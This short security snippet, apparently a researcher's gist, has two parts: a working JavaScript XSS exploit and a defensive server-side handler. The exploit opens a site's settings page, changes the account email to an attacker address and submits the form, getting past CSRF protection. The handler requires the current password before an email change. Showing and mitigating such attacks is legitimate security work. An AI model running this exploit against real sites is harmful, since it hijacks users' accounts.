This is a sample exploit for an XSS vulnerability that changes the user's email address. It bypasses some CSRF protections, as the page was revoking the CSRF protections when refreshed.
// A simple XSS exploit for email change
// Shawar Khan
var dark_window = window.open('https://www.target.com/settings');
dark_window.addEventListener('load',
    function exploit_run() {
        dark_window.document.body.getElementsByTagName('form')[0][2].value = 'attacker@attacker.com'; // changes email
        dark_window.document.body.getElementsByTagName('form')[0][40].click(); // clicks for submission
        setTimeout(function () { // just for delay and closing
            dark_window.close();
        }, 10000);
    }, true);
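
One server-side mitigation for the flow above, as an added example that is not part of the original gist: script running in the page's own origin submits the real form with its real CSRF token, so the email-change handler also demands the current password, which the page never contains. The handler `changeEmail`, its request fields and the sample data are assumptions made for illustration.

```javascript
// Added defensive example; all names and sample data are constructed.
const nodeCrypto = require('node:crypto');

// Hash a password with scrypt and a per-user random salt.
function hashPassword(password, salt = nodeCrypto.randomBytes(16)) {
  return { salt, hash: nodeCrypto.scryptSync(password, salt, 32) };
}

// Constant-time check of a submitted password against the stored record.
function verifyPassword(password, record) {
  const candidate = nodeCrypto.scryptSync(password, record.salt, 32);
  return nodeCrypto.timingSafeEqual(candidate, record.hash);
}

// Hypothetical handler for an email-change POST. A valid session and CSRF
// token are not sufficient, because same-origin injected script has both.
// Returns { status, notify } instead of writing an HTTP response.
function changeEmail(user, session, body) {
  if (!session || session.userId !== user.id) return { status: 401, notify: [] };
  const sent = Buffer.from(String(body.csrfToken));
  const expected = Buffer.from(session.csrfToken);
  if (sent.length !== expected.length || !nodeCrypto.timingSafeEqual(sent, expected)) {
    return { status: 403, notify: [] };
  }
  // Step-up check: require the current password for this sensitive change.
  if (typeof body.currentPassword !== 'string' ||
      !verifyPassword(body.currentPassword, user.password)) {
    return { status: 403, notify: [] };
  }
  const previous = user.email;
  user.email = body.newEmail;
  // Notify the old address so an unexpected change is visible to the owner.
  return { status: 200, notify: [previous] };
}

// Constructed sample account and session.
const user = { id: 7, email: 'owner@example.com', password: hashPassword('correct horse') };
const session = { userId: 7, csrfToken: 'b7c1f0a2d4e6' };

// A script-driven form submission: session and token present, no password.
const scripted = changeEmail(user, session,
  { csrfToken: 'b7c1f0a2d4e6', newEmail: 'other@example.net' });
// The account owner, who typed the current password into the form.
const genuine = changeEmail(user, session,
  { csrfToken: 'b7c1f0a2d4e6', newEmail: 'new@example.com', currentPassword: 'correct horse' });
console.log(scripted.status, genuine.status, user.email);
```

The step-up check limits what an injected script can change; it does not remove the need to fix the XSS itself.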